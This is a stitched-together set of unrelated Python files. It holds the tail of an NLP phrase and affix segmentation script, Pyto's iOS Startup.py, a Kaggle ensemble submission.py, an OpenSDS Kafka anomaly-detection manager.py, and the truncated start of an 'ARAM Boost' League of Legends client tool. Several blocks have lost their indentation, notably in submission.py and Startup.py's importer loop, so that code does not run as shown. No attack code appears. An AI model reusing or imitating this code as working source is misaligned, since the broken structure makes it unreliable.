inter_ = set_std_ & set_inv_;
#-left-certain-right-min--------------------------------------------------------------
#-------------------------------------------------------------------------------------
set_std__ = set(probs_leq(_or_p_,_or_c_,tree));
set_inv__ = set([tuple(reversed(el)) for el in probs_leq(1.0,_or_c_,tree_inv)]);
inter__ = set_std__ & set_inv__;
#-------------------------------------------------------------------------------------
union = inter | inter_ | inter__;
#-------------------------------------------------------------------------------------
print(union);
print(len(inter), '+', len(inter_), '->', len(inter|inter_), '+', len(inter__), '->', len(union));
# Dump detected phrases (one "w1 w2" per line) and the spelling replacements.
OUT = open(phrfile,'w');
for tup in union:
    OUT.write(tup[0]+' '+tup[1]+'\n');
OUT.close();
OUT = open(trafile,'w');
for key in replace:
    OUT.write(key+' '+replace[key]+'\n');
OUT.close();
#OUT = open(modfile,'w');
#for term1 in transition:
#    for term2 in transition[term1]:
#        OUT.write(term1+' '+term2+' '+str(transition[term1][term2])+'\n');
#OUT.close();
#########################################################################################################################################
# Phase 5: affix analysis.  Segment the vocabulary into affixes (forward and
# reversed), count affix n-grams, and derive per-term split candidates from
# branching entropy; results go to the split-model file.
terms = terms;
terms_inv = sorted([term[::-1] for term in terms]);
affixes_of = make_affixes(terms);
suffixes_of = make_affixes(terms_inv);
# Un-reverse the suffix segmentation so it reads left-to-right again.
suffixes_of = {key[::-1]:[(affix[::-1],num,) for affix,num in suffixes_of[key][::-1]] for key in suffixes_of}
agrams = ([(affixes_of[term][i][0],affixes_of[term][i+1][0],) for i in range(len(affixes_of[term])-1)]+[(affixes_of[term][-1][0],)] if len(affixes_of[term])>=2 else [(affixes_of[term][-1][0],)] for term in affixes_of);
agrams = [gram for grams in agrams for gram in grams];
zgrams = ([(affixes_of[term][i+1][0],affixes_of[term][i][0],) for i in range(len(affixes_of[term])-1)]+[(affixes_of[term][0][0],)] if len(affixes_of[term])>=2 else [(affixes_of[term][0][0],)] for term in affixes_of);
zgrams = [gram for grams in zgrams for gram in grams];
tree = make_tree(Counter(agrams));
tree_inv = make_tree(Counter(zgrams));
# Merge adjacent affixes unless the pair was detected as a phrase boundary.
affixes_of_ = dict();
count = 0;
for term in affixes_of:
    count += 1;
    if count == 1000000:
        pass;#break;
    affixes_of_[term] = [];
    current = affixes_of[term][0];
    for i in range(len(affixes_of[term])):
        if i == len(affixes_of[term])-1:
            affixes_of_[term] += [current];
        elif not (affixes_of[term][i],affixes_of[term][i+1],) in inter_:
            current += affixes_of[term][i+1];
        else:
            affixes_of_[term] += [current];
            current = affixes_of[term][i+1];
    print(affixes_of_[term]);
# Count every affix-prefix tuple, weighted by the joined string's frequency.
agram_counter = Counter();
for term in affixes_of:
    affixes = [affix for affix,dist in affixes_of[term]];
    for i in range(len(affixes)):
        ngram = tuple(affixes[:i+1]);#+[None for j in range(i+1,len(affixes))]);
        agram_counter[ngram] = d[(''.join([gram for gram in ngram if gram!=None]),)];
        print(ngram,d[(term,)]);#d[(''.join([gram for gram in ngram if gram!=None]),)]);
tree = make_tree_(agram_counter);
splits = dict();
get_splits([],tree[1],splits,True,0.01,3);
# Collect the final segment of every split as a "leftover" suffix candidate.
leftovers = set();
for key in splits:
    LIST = [''] + splits[key];
    PARTS = [LIST[i][len(LIST[i-1]):] for i in range(len(LIST))][1:];
    leftovers.add(PARTS[-1]);
# Repeat the split analysis on the reversed leftovers to split suffixes.
terms_inv = sorted([term[::-1] for term in leftovers]);
suffixes_of = make_affixes(terms_inv);
suffixes_of = {key[::-1]:[(affix[::-1],num,) for affix,num in suffixes_of[key][::-1]] for key in suffixes_of}
zgram_counter = Counter();
for term in suffixes_of:
    suffixes = [affix for affix,dist in suffixes_of[term]];
    for i in range(len(suffixes)):
        ngram = tuple(suffixes[:i+1]);#+[None for j in range(i+1,len(affixes))]);
        key = ''.join([gram for gram in ngram if gram!=None]);
        zgram_counter[ngram] = d[(key,)] if (key,) in d else 0.000000001;
        #print(ngram,d[(term,)]);#d[(''.join([gram for gram in ngram if gram!=None]),)]);
tree_inv = make_tree_(zgram_counter);
splits_inv = dict();
get_splits([],tree_inv[1],splits_inv,True,0.01,3);
# Combine prefix splits with suffix splits of the last part into the final
# per-term set of split strings and write them to the model file.
splittings = dict();
for key in splits:
    LIST = [''] + splits[key];
    PARTS = [LIST[i][len(LIST[i-1]):] for i in range(len(LIST))][1:];
    ENDS = [''] + splits_inv[PARTS[-1]] if PARTS[-1] in splits_inv else ['',PARTS[-1]];
    PARTS_ = [ENDS[i][len(ENDS[i-1]):] for i in range(len(ENDS))][1:];
    SPLITS = PARTS[:-1]+PARTS_;
    print('--------------------');
    additionals = [PART for PART in PARTS_ if (PART,) in d and len(PART)>2 and d[(PART,)]>50];
    additionals_ = [PART for PART in [''.join(ngram) for ngram in ngrams(PARTS_,2)+ngrams(PARTS,3)+ngrams(PARTS,4)] if (PART,) in d and len(PART)>2 and d[(PART,)]>0];
    prefixes = [''.join(PARTS [:i]) for i in range(1,len(PARTS )+1)];
    suffixes = [''.join(SPLITS[:i]) for i in range(1,len(SPLITS)+1)];
    print(set(prefixes+additionals+additionals_));
    splittings[key] = set(prefixes+additionals+additionals_);
OUT = open(modfile,'w');
for term in splittings:
    OUT.write(term+' '+' '.join((split for split in splittings[term] if split != term))+'\n');
OUT.close();
# Dead code kept as a string literal: an earlier phrase-joining/representative
# selection pass that is no longer executed.
'''
for root in tree[1]:
    print('---------------------------------------\n'+root+'\n---------------------------------------');
    print(tree[1][root]);
    print('---------------------------------------\n');
lines_ = [];
for line in lines:
    if len(line)<=1:
        lines_.append(line);
        continue;
    else:
        line_ = [];
        bigrams = ngrams(line,2);
        phrase = bigrams[0][0];
        for bigram in bigrams:
            if bigram in union:
                phrase += '_'+bigram[1];
            else:
                line_ += [phrase];
                phrase = bigram[1];
        if len(line_)==0 or not line_[-1].endswith(phrase): line_.append(phrase);
        lines_.append(line_);
reps = [];
for i in range(len(lines_)):
    rep = set([string for string in lines_[i] if len(string)>=3]) - illeg;
    reps.append(rep);
for i in range(len(reps)):
    if len(reps[i])>_max_len_:
        rep = set([tup[1] for tup in sorted([(d[el],el) for el in rep])][:_max_len_]);
'''
|
Startup.py | import sys
import os
sys.path.insert(-1, os.path.expanduser("~/Documents"))
sys.path.insert(-1, os.path.expanduser("~/Documents/modules"))
import io
import console
import code
import pyto
from importlib.machinery import SourceFileLoader
import importlib
import threading
from time import sleep
from outputredirector import Reader
from extensionsimporter import *
import warnings
import logging
from _ios_getpass import getpass as _ios_getpass
import getpass
import webbrowser
import sharing
import _signal
from pip import BUNDLED_MODULES
# MARK: - Warnings
# Default log level for the embedded interpreter's logging output.
logging.basicConfig(level=logging.INFO)
def __send_warnings_to_log__(message, category, filename, lineno, file=None, line=None):
    """warnings.showwarning replacement that surfaces warnings in Pyto's UI.

    Tags the warning with the running script's path when the current thread
    exposes ``script_path``.  The bare try/excepts re-import modules in case
    the startup globals were torn down before a late warning fires.
    """
    try:
        warnings
    except:
        import warnings
    try:
        pyto
    except:
        import pyto
    _message = warnings.formatwarning(message, category, filename, lineno, line)
    try:
        pyto.PyOutputHelper.printWarning(_message, script=threading.current_thread().script_path)
    except AttributeError:
        pyto.PyOutputHelper.printWarning(_message, script=None)
    return
# Route all warnings through the Pyto console handler defined above.
warnings.showwarning = __send_warnings_to_log__
pyto.Python.shared.version = sys.version
# MARK: - Allow / Disallow subprocesses
# Subprocesses are unavailable on iOS proper; other platforms allow them.
os.allows_subprocesses = (not sys.platform == "ios")
# MARK: - Input
def askForInput(prompt=None):
    """Replacement for builtins.input used by Pyto's console.

    Returns "" for threads the console ignores; otherwise delegates to
    console.input.  The defensive try/except re-imports cover the case
    where the startup namespace was torn down.
    """
    try:
        threading
    except NameError:
        import threading
    try:
        console
    except NameError:
        import console
    # current_thread() replaces the currentThread() alias, which is
    # deprecated since Python 3.10 (removed in 3.12); behavior is identical.
    if (threading.current_thread() in console.ignoredThreads):
        return ""
    else:
        return console.input(prompt)
# Install the console-aware input() and an iOS-compatible getpass globally.
__builtins__.input = askForInput
getpass.getpass = _ios_getpass
# MARK: - Output
def read(text):
    """Writer callback for the output redirector: forward text to the Pyto
    console verbatim (no trailing newline added)."""
    try:
        console
    except NameError:
        import console
    console.print(text, end="")
# Redirect stdout/stderr through Reader objects that feed read() above so all
# process output appears in the Pyto console.
standardOutput = Reader(read)
standardOutput._buffer = io.BufferedWriter(standardOutput)
standardError = Reader(read)
standardError._buffer = io.BufferedWriter(standardError)
sys.stdout = standardOutput
sys.stderr = standardError
# MARK: - Web browser
class MobileSafari(webbrowser.BaseBrowser):
    '''
    Mobile Safari web browser.

    webbrowser backend that hands URLs to iOS via sharing.open_url.
    '''
    def open(self, url, new=0, autoraise=True):
        # new/autoraise are accepted for BaseBrowser API compatibility but
        # have no effect on iOS.
        sharing.open_url(url)
        return True
webbrowser.register("mobile-safari", None, MobileSafari("MobileSafari.app"))
# MARK: - Modules
for importer in (NumpyImporter, MatplotlibImporter, PandasImporter, PillowImporter, BiopythonImporter, LXMLImporter, ScipyImporter, SkLearnImporter, SkImageImporter, PywtImporter, NaclImporter):
sys.meta_path.insert(0, importer())
# MARK: - Pre-import modules
def importModules():
    """Pre-import heavy modules in the background and patch PIL's image
    viewer to use iOS Quick Look instead of an external viewer."""
    try:
        import PIL.ImageShow
        def show_image(image, title=None, **options):
            # Save to a temp PNG whose name is not already in use, then
            # present it with Quick Look.
            import os
            import tempfile
            import sharing
            imgPath = tempfile.gettempdir()+"/image.png"
            i = 1
            while os.path.isfile(imgPath):
                i += 1
                imgPath = os.path.join(tempfile.gettempdir(), 'image '+str(i)+'.png')
            image.save(imgPath, "PNG")
            if title == "OpenCV":
                sharing.quick_look(imgPath, remove_previous=True)
            else:
                sharing.quick_look(imgPath)
        PIL.ImageShow.show = show_image
    except ImportError:
        pass
# Run the pre-imports off the main thread so startup is not blocked.
threading.Thread(target=importModules).start()
# MARK: - Create a Selector without class.
__builtins__.Selector = pyto.PySelector.makeSelector
__builtins__.Target = pyto.SelectorTarget.shared
# MARK: - Deprecations
__builtins__.deprecated = []
# MARK: - Pip bundled modules
if pyto.PipViewController != None:
    pyto.PipViewController.bundled = BUNDLED_MODULES
# MARK: - OS
def fork():
    """Stub: fork() is unsupported on iOS, so this is a no-op."""
    pass
def waitpid(pid, options):
    """Stub: always report "no child" as (-1, 0), since fork is a no-op."""
    return (-1, 0)
# Replace the unsupported process primitives with the stubs above.
os.fork = fork
os.waitpid = waitpid
# MARK: - Handle signal called outside main thread
# Keep the real signal() so the wrapper below can delegate to it.
old_signal = _signal.signal
def signal(signal, handler):
    """_signal.signal wrapper: installing handlers is only legal on the main
    thread, so calls from other threads are silently ignored (return None).

    NOTE(review): the first parameter shadows the function's own name;
    harmless here since delegation goes through ``old_signal``.
    """
    try:
        threading
    except NameError:
        import threading
    if threading.main_thread() == threading.current_thread():
        return old_signal(signal, handler)
    else:
        return None
_signal.signal = signal
# MARK: - Run script
pyto.Python.shared.isSetup = True
# "%@" is substituted with the real script path by the native side before
# this file runs; the loop re-runs the script after every failure so an
# exception never kills the interpreter.
while True:
    try:
        SourceFileLoader("main", "%@").load_module()
    except Exception as e:
        print(e)
|
submission.py | from __future__ import print_function
import grasp
import ensemble
import importlib
import sys
import os
import subprocess
from multiprocessing import Process
import yaml
import json
import argparse
with open("SETTINGS.json") as file:
config = json.load(file)
with open("final_nets.yml") as file:
all_net_kwargs = yaml.load(file)
for x in all_net_kwargs:
if ('dropch' in x) and x.pop('dropch'):
x['ch'] = range(2,32)
def check_output_names(net_kwargs):
    """Ensure every net configuration has a distinct ``output_name``.

    Raises ValueError on the first duplicate encountered.
    """
    seen = set()
    for cfg in net_kwargs:
        current = cfg["output_name"]
        if current in seen:
            raise ValueError("duplicate output name", current)
        seen.add(current)
check_output_names(all_net_kwargs)

# We weighted known-good results (0.97+ on the public leaderboard) by 2
# relative to the other results.
ensemble_weights = { 'net_stf7.csv':2,
                     "net_stf7b.csv":2,
                     "net_stf7i.csv":2,
                     'net_stf7m.csv':2,
                     'net_stf7_fea6_150e20_LPF_00_100_dense1024_val6_allfreqdata.csv':2,
                     # We intended to weight this net by two, but another net that
                     # was supposed to be in here net_stf7m_v3i somehow ended up
                     # being replaced by a duplicate of net_stf7b_v3i so it was
                     # effectively weighted by 4.
                     'net_stf7b_v3i.csv' : 4,
                     }
def run_only_kwargs(kwargs):
    """Return a copy of *kwargs* with training-only keys removed.

    Used by the "dry" run type, where the net is instantiated but not
    trained, so data/validation parameters are irrelevant.
    """
    trimmed = dict(kwargs)
    for unused in ('min_freq', 'max_freq', 'validation', "train_size", "valid_size"):
        trimmed.pop(unused, None)
    return trimmed
def run_net(i, run_type="run"):
    """Train (or dry-run) net #*i* from ``all_net_kwargs`` and write its CSV.

    run_type:
        "run"       -- full training, dump the model, write the submission CSV.
        "dry"       -- instantiate the net only; nothing is written.
        "test_dump" -- 1-epoch smoke training dumped to "<name>.dump.test".
        "test_csv"  -- 1-epoch smoke training plus a "<name>.csv.test" file.

    Existing dump/CSV files are reused instead of being recomputed.
    """
    kwargs = all_net_kwargs[i].copy()
    print("*"*64)
    mod_name = kwargs.pop("net")
    output_name = kwargs.pop("output_name")
    dump_path = os.path.join(config["MODEL_PATH"], output_name) + ".dump"
    csv_path = os.path.join(config["SUBMISSION_PATH"], output_name) + ".csv"
    print("Loading module", mod_name, "for net", output_name)
    mod = importlib.import_module("nets." + mod_name)
    factory = getattr(mod, 'create_net')
    if run_type == "dry":
        # Instantiate with dummy data so the kwargs are validated without
        # any training taking place.
        kwargs = run_only_kwargs(kwargs)
        items = ["{0}={1}".format(k,v) for (k,v) in sorted(kwargs.items())]
        argstring = ", ".join(['None', 'None'] + items)
        print("Instantiating:", "{0}.create_net({1})".format(mod_name, argstring))
        net = factory(None, None, **kwargs)
        print("Would normally dump results to:", csv_path)
    else:
        if os.path.exists(dump_path):
            # A trained model exists on disk; load it rather than retrain.
            print(dump_path, "already exists; skipping training")
            print("Executing:", "info = load({0})".format(dump_path))
            info = grasp.load(dump_path)
        else:
            if run_type in ("test_dump", "test_csv"):
                # Fast smoke test: single epoch, written to ".test" files so
                # real artifacts are not clobbered.
                kwargs["max_epochs"] = 1
                kwargs["epoch_boost"] = 0
                dump_path += ".test"
                csv_path += ".test"
            items = ["{0}={1}".format(k,v) for (k,v) in sorted(kwargs.items())]
            argstring = ", ".join(["{0}.create_net".format(mod_name)] + items)
            print("Executing:", "info = train_all({1})".format(mod_name, argstring))
            info = grasp.train_all(factory, **kwargs)
            print("Executing:", "dump(info, '{0}')".format(dump_path))
            grasp.dump(info, dump_path)
        if run_type != "test_dump":
            if os.path.exists(csv_path) or os.path.exists(csv_path + ".gz"):
                print(csv_path, "already exists; skipping")
                return
            print("Executing: make_submission(info)")
            grasp.make_submission(info, csv_path)
def submitted_net_names():
    """Return the output names of all configured nets, in file order."""
    names = []
    for net in all_net_kwargs:
        names.append(net['output_name'])
    return names
def worker(offset, run_type):
    """Process every (offset + k*n_workers)-th net in a fresh subprocess.

    Each worker gets its own THEANO_FLAGS value (round-robin over the list
    configured in SETTINGS.json) so multiple GPUs can be used; each net's
    stdout goes to a ".log" file next to its CSV.
    """
    # flags = THEANO_FLAGS[offset % len(THEANO_FLAGS)]
    env = os.environ.copy()
    env["THEANO_FLAGS"] = config["theano_flags"][offset%len(config["theano_flags"])]
    n_workers = config["submission_workers"]
    for i in range(offset, len(all_net_kwargs), n_workers):
        print("processing", all_net_kwargs[i]["output_name"])
        print(env["THEANO_FLAGS"] )
        output_name = all_net_kwargs[i]["output_name"]
        csv_path = os.path.join(config["SUBMISSION_PATH"], output_name) + ".csv"
        with open(csv_path + ".log", 'w') as log:
            # Re-invoke this script for a single net so each net runs in its
            # own process with its own Theano configuration.
            subprocess.check_call(["python", "submission.py", '-r', run_type, '-n', str(i)], stdout=log, env=env
                                  )
if __name__ == "__main__":
    # Full usage text shown by argparse (RawDescriptionHelpFormatter keeps
    # the layout intact).
    help = """
    `python submission.py -h` -- list this help message.
    `python submission.py -r run -n <N>` -- train net #N.
    `python submission.py -r run` -- train all nets. This will take a LONG time.
    `python submission.py -r ensemble` -- compute the weighted average used in final submission.

    The directories for train, test, dumped models and csv output files are
    set in SETTINGS.json.

    When running all nets, the programs spreads the load out over `submission_workers`
    processes. Mulitple GPUs can be used by specifying an appropriate set of flags in
    `theano_flags`. Both of these can be found in SETTINGS.json.

    Note that this first checks if the dump file for a given net exists, if so it uses
    that, if not, it retrains the net (slow). Then it checks if the csv file exists for
    this net, creating it if it doesn't exist.

    The submitted nets that are availble to run are:
    """
    # One "<index>: <name>" line per configured net, appended to the help.
    net_names = "\n".join(" {0}: {1}".format(i, x) for (i, x) in
                          enumerate(submitted_net_names()))
    brief = ("This is the main program to train the neural nets,\n"
             "save the nets into model files and generate predictions\n"
             "to testing set,and save it to csv output submission files.\n\n")
    parser = argparse.ArgumentParser(prog="python submission.py",
                                     formatter_class=argparse.RawDescriptionHelpFormatter,
                                     description=brief+help+net_names)
    parser.add_argument('-r','--run_type', help='The run type' , required=True)
    parser.add_argument('-n','--net', type=int, help='Neural Net ID', default=-1)
    args = parser.parse_args()
    run_type = args.run_type
    which = args.net

    ## show values ##
    print ("The run type is: %s" % run_type )
    print ("The network to train: %s" % which )

    if which != -1:
        # Single-net mode: run exactly one net in this process.
        assert run_type in ["run", "test_csv", "test_dump", "dry"], run_type
        print("Running net: " + str(which) + " with runtype of: " + str(run_type))
        run_net(which, run_type)
    else:
        if run_type == "ensemble":
            # Weighted average of the per-net CSVs into the final submission.
            output_path = os.path.join(config["SUBMISSION_PATH"], "ensemble.csv")
            input_paths = [os.path.join(config["SUBMISSION_PATH"], x["output_name"]) + '.csv' for x in all_net_kwargs]
            ensemble.naive_ensemble(output_path, input_paths, ensemble_weights)
            print("Running ensemble")
        else:
            # Fan the nets out across `submission_workers` processes.
            print("Running nets in parallel")
            jobs = [Process(target=worker, args=(i, run_type)) for i in range(config["submission_workers"])]
            for p in jobs:
                p.start()
            for p in jobs:
                p.join()
|
manager.py | # Copyright 2019 The OpenSDS Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import time
import json
import threading
import log
from utils import base
from utils import config as cfg
from kafka import KafkaConsumer
import pandas as pd
import numpy as np
import tensorflow as tf
LOG = log.getLogger(__name__)
CONF = cfg.CONF

# Kafka connection options, registered under the "data_parser" group.
data_parser_opts = [
    cfg.StrOpt('kafka_bootstrap_servers',
               default='localhost:9092',
               help='kafka bootstrap server'),
    cfg.StrOpt('kafka_topic',
               default='delfin-kafka',
               help='kafka topic'),
    cfg.IntOpt('kafka_retry_num',
               default=3,
               help='kafka retry num')
]
CONF.register_opts(data_parser_opts, "data_parser")

# Maximum number of metric samples kept per storage (sliding window).
DATA_ENTRIES_COUNT = 1000
class DataReceiver(base.Base):
    """Abstract base for metric receivers; subclasses must implement run()."""

    def __init__(self, name):
        super(DataReceiver, self).__init__()
        # Human-readable receiver name, e.g. "kafka".
        self._name = name

    def run(self):
        # BUG FIX: the original used `raise NotImplemented`, which fails with
        # "TypeError: exceptions must derive from BaseException" because
        # NotImplemented is a sentinel value, not an exception class.
        raise NotImplementedError
class DataDictionary:
    """Per-storage sliding window of metric samples.

    Keys are storage ids; each value is a list of at most DATA_ENTRIES_COUNT
    metric dicts, with the oldest entry dropped first.
    """

    def __init__(self):
        self.dict = {}

    # BUG FIX: the original defined get() twice; the zero-argument overload
    # shadowed get(key), making per-key lookup unreachable. A single method
    # with an optional key preserves both call styles.
    def get(self, key=None):
        """Return the sample list for *key*, or the whole dict if key is None."""
        if key is None:
            return self.dict
        return self.dict.get(key)

    def update(self, key, value):
        """Append *value* for *key*, keeping at most DATA_ENTRIES_COUNT entries."""
        if key in self.dict.keys():
            # sample only DATA_ENTRIES_COUNT
            if len(self.dict[key]) >= DATA_ENTRIES_COUNT:
                self.dict[key].pop(0)
        else:
            self.dict[key] = []
        LOG.debug("Updating metric for %s with %s", key, value)
        self.dict[key].append(value)

    def has_key(self, key):
        """Return True when samples exist for *key*."""
        return key in self.dict.keys()

    def print(self):
        # Dump the whole dictionary to the log (name shadows the builtin,
        # kept for interface compatibility).
        LOG.info(str(self.dict))

    def len(self, key):
        """Number of samples currently held for *key*."""
        return len(self.dict[key])
class ModelDictionary:
    """Maps each storage id to its trained anomaly-detection model."""

    def __init__(self):
        self.dict = {}

    def get(self, key):
        """Return the model stored for *key*, or None if absent."""
        return self.dict.get(key)

    def update(self, key, value):
        """Store or replace the model for *key*."""
        self.dict[key] = value

    def has_key(self, key):
        """Return True when a model exists for *key*."""
        return key in self.dict

    def print(self):
        """Dump the whole mapping to the log."""
        LOG.info(str(self.dict))
class TrainingDictionary:
    """Per-storage training statistics (e.g. Mean, STD, Threshold)."""

    def __init__(self):
        self.dict = {}

    def get(self, key):
        """Return the stats dict for *key*, or None if absent."""
        return self.dict.get(key)

    def update(self, key, value):
        """Store or replace the stats dict for *key*."""
        self.dict[key] = value

    def add_entry(self, dict_key, key, value):
        """Set one field on the existing stats dict of *dict_key*."""
        entry = self.dict[dict_key]
        entry[key] = value
        self.dict[dict_key] = entry

    def has_key(self, key):
        """Return True when stats exist for *key*."""
        return key in self.dict

    def print(self):
        """Dump the whole mapping to the log."""
        LOG.info(str(self.dict))
# Module-level singletons shared between the Kafka consumer thread and the
# periodic processing loop.
data_dictionary = DataDictionary()
model_dictionary = ModelDictionary()
training_dictionary = TrainingDictionary()
# Window length fed to the autoencoder (presumably one day of 5-minute
# samples: 288 * 5 min = 24 h — TODO confirm).
TIME_STEPS = 288

# Generated training sequences for use in the model.
def create_sequences(values, time_steps=TIME_STEPS):
    """Slice *values* into overlapping windows of length *time_steps*.

    Returns a stacked array with one window per starting index in
    ``range(len(values) - time_steps)``.
    """
    windows = [values[start : start + time_steps]
               for start in range(len(values) - time_steps)]
    return np.stack(windows)
# Visualize the data
# Timeseries data without anomalies
def create_training_value(key, values):
    """Build normalized training sequences for storage *key*.

    *values* is the list of metric dicts collected for the storage; each
    dict is assumed to hold a single {timestamp: reading} pair — TODO
    confirm against the Kafka message schema.

    On the first call for a key the mean/std are computed and cached in
    training_dictionary; later calls reuse them so that evaluation data is
    normalized with the original training statistics.
    """
    train_data = {}
    for value in values:
        # Take the single key of each sample dict as the row index.
        val_keys = list(value.keys())[0]
        train_data[val_keys] = [value[val_keys]]
    train_df = pd.DataFrame.from_dict(train_data, orient='index', columns=['read_bandwidth'])
    if training_dictionary.has_key(key):
        # if training is already available, case of checking anomaly
        train_dict = training_dictionary.get(key)
        df_training_value = (train_df - train_dict.get('Mean')) / train_dict.get('STD')
        x_train = create_sequences(df_training_value.values)
        LOG.info("Training input shape for anomaly detection: %s", x_train.shape)
        return x_train
    else:
        # case for first time training
        training_mean = train_df.mean()
        training_std = train_df.std()
        training_dictionary.update(key, {'Mean': training_mean, 'STD': training_std})
        df_training_value = (train_df - training_mean) / training_std
        x_train = create_sequences(df_training_value.values)
        LOG.info("Training input shape for training: %s", x_train.shape)
        return x_train
def create_model(x_train):
    """
    ## Build a model
    We will build a convolutional reconstruction autoencoder model. The model will
    take input of shape `(batch_size, sequence_length, num_features)` and return
    output of the same shape. In this case, `sequence_length` is 288 and
    `num_features` is 1.
    """
    # Symmetric encoder (two strided Conv1D layers) / decoder
    # (Conv1DTranspose layers) pair with dropout for regularization.
    model = tf.keras.Sequential(
        [
            tf.keras.layers.Input(shape=(x_train.shape[1], x_train.shape[2])),
            tf.keras.layers.Conv1D(
                filters=32, kernel_size=7, padding="same", strides=2, activation="relu"
            ),
            tf.keras.layers.Dropout(rate=0.2),
            tf.keras.layers.Conv1D(
                filters=16, kernel_size=7, padding="same", strides=2, activation="relu"
            ),
            tf.keras.layers.Conv1DTranspose(
                filters=16, kernel_size=7, padding="same", strides=2, activation="relu"
            ),
            tf.keras.layers.Dropout(rate=0.2),
            tf.keras.layers.Conv1DTranspose(
                filters=32, kernel_size=7, padding="same", strides=2, activation="relu"
            ),
            tf.keras.layers.Conv1DTranspose(filters=1, kernel_size=7, padding="same"),
        ]
    )
    model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001), loss="mse")
    # model.summary()
    return model
def training_model(model, x_train):
    """
    ## Train the model
    Please note that we are using `x_train` as both the input and the target
    since this is a reconstruction model.
    """
    history = model.fit(
        x_train,
        x_train,
        epochs=50,
        batch_size=128,
        validation_split=0.1,
        callbacks=[
            # Stop early once validation loss stops improving for 5 epochs.
            tf.keras.callbacks.EarlyStopping(monitor="val_loss", patience=5, mode="min")
        ],
    )
    LOG.debug("Loss in training %s ", history.history["loss"])
    LOG.debug("Validation loss in training %s ", history.history["val_loss"])
    return model
# Seconds to wait between processing passes over the collected metrics.
SLEEP_SEC = 60

def process_data_dictionary():
    """Periodic worker: train models and detect anomalies per storage.

    Every SLEEP_SEC seconds, for each storage with at least
    DATA_ENTRIES_COUNT samples, either trains a new autoencoder (first
    pass) or scores the latest window against the stored loss threshold.
    Runs forever; intended to be started on a daemon-style thread.
    """
    while True:
        LOG.info("--------------> Sleeping for %s sec <--------- ", SLEEP_SEC)
        time.sleep(SLEEP_SEC)
        data_dict = data_dictionary.get()
        for key in data_dict:
            # Storage ID is key
            LOG.info("Processing storage[%s] metrics", key)
            # Skip processing if entries less than DATA_ENTRIES_COUNT
            if data_dictionary.len(key) < DATA_ENTRIES_COUNT:
                LOG.info("Skipping processing as entries are less for storage[%s] len(%s)", key, data_dictionary.len(key))
                continue
            # Training values
            x_train = create_training_value(key, data_dict[key])
            if training_dictionary.has_key(key) and 'Threshold' in training_dictionary.get(key).keys():
                # A model and threshold already exist: score the new window.
                # get the prediction
                x_test_pred = model_dictionary.get(key).predict(x_train)
                test_mae_loss = np.mean(np.abs(x_test_pred - x_train), axis=1)
                test_mae_loss = test_mae_loss.reshape((-1))
                # print anomalies
                threshold = training_dictionary.get(key)['Threshold']
                anomalies = test_mae_loss > threshold
                # Check for anomaly
                anomaly = False
                for x in anomalies:
                    if x:
                        anomaly = True
                        LOG.warning("Anomaly detected")
                        break
                if not anomaly:
                    LOG.info("Anomaly not detected")
            else:
                # First pass for this storage: train a model and record the
                # maximum reconstruction error as the anomaly threshold.
                model = create_model(x_train)
                train_model = training_model(model, x_train)
                # Update the trained model
                model_dictionary.update(key, train_model)
                # Get train MAE loss.
                x_train_pred = train_model.predict(x_train)
                train_mae_loss = np.mean(np.abs(x_train_pred - x_train), axis=1)
                # Get reconstruction loss threshold.
                threshold = np.max(train_mae_loss)
                training_dictionary.add_entry(key, 'Threshold', threshold)
                LOG.info("Training loss threshold : %s", threshold)
class KafkaDataReceiver(DataReceiver):
    """DataReceiver that consumes performance metrics from a Kafka topic."""

    def __init__(self):
        super(KafkaDataReceiver, self).__init__(name="kafka")

    def consume(self):
        """Consume metric messages forever, feeding data_dictionary.

        Each message is a JSON list of triples; position [1] appears to
        carry labels (storage id) and [2] the values — TODO confirm the
        producer's message schema. Only 'read_bandwidth' is recorded.
        """
        consumer = KafkaConsumer(CONF.data_parser.kafka_topic,
                                 bootstrap_servers=CONF.data_parser.kafka_bootstrap_servers,
                                 auto_offset_reset='earliest')
        for msg in consumer:
            perf = json.loads(msg.value)
            # Extract storage_id
            storage_id = [elem for elem in perf[0][1].values()][0]
            LOG.debug("Adding metric for storage_id : %s", storage_id)
            for data in perf:
                if data[0] == 'read_bandwidth':
                    LOG.debug("Data to be updated : %s", [elem for elem in data[2].values()][0])
                    if [elem for elem in data[2].values()][0] > 100:
                        LOG.warning("Should detect anomaly for [%s]", storage_id)
                    data_dictionary.update(storage_id, data[2])
                    break

    def run(self):
        """Run consume(), retrying up to kafka_retry_num times on failure."""
        retry = CONF.data_parser.kafka_retry_num
        for index in range(1, retry+1):
            try:
                self.consume()
            except KeyboardInterrupt:
                LOG.info("Bye!")
                break
            except Exception as e:
                # BUG FIX: the original tested `index > retry`, which is
                # never true inside range(1, retry+1), so the final failure
                # silently fell out of the loop instead of re-raising.
                if index >= retry:
                    LOG.error('%s\nall retry failed, exit.', e)
                    raise
                else:
                    LOG.error("%s ,retry %d time(s)", e, index)
            else:
                break
class Manager(base.Base):
    """Wires the periodic processing thread together with the data receiver."""

    def __init__(self, receiver_name):
        super(Manager, self).__init__()
        # NOTE(review): receiver_name is currently ignored; the receiver is
        # hard-wired to Kafka.
        self._receiver = KafkaDataReceiver()

    def run(self):
        """Start the anomaly-processing thread, then block in the consumer."""
        try:
            thread = threading.Thread(target=process_data_dictionary)
            thread.start()
            # Blocks in the Kafka consumer loop; the thread runs concurrently.
            self._receiver.run()
            thread.join()
        except Exception as e:
            LOG.error("%s ", e)
|
boost.py | # -*- coding: utf-8 -*-
from lcu_driver import Connector
import tkinter as tk
from tkinter import messagebox
import threading, os
__author__: str = "R3nzTheCodeGOD"
__version__: str = "1.0.4"

# Main Tk window and the League client connector (lcu_driver).
window = tk.Tk()
client = Connector()
name = ""
# Set by the Boost button; polled by the connector loop.
buttonClick = False

window.title("ARAM Boost")
window.geometry("300x150")
window.minsize(300, 150)
window.maxsize(400, 200)
window.eval('tk::PlaceWindow . center')
window.configure(bg="#191970")
async def get_name(cmd) -> bool:
    """Fetch the current summoner's display name from the LCU API.

    On success stores it in the module-level *name*, updates the status
    label, and returns True; returns False on any non-200 response.
    """
    summoner = await cmd.request("GET", "/lol-summoner/v1/current-summoner")
    if summoner.status == 200:
        data: dict = await summoner.json()
        global name
        name = data['displayName']
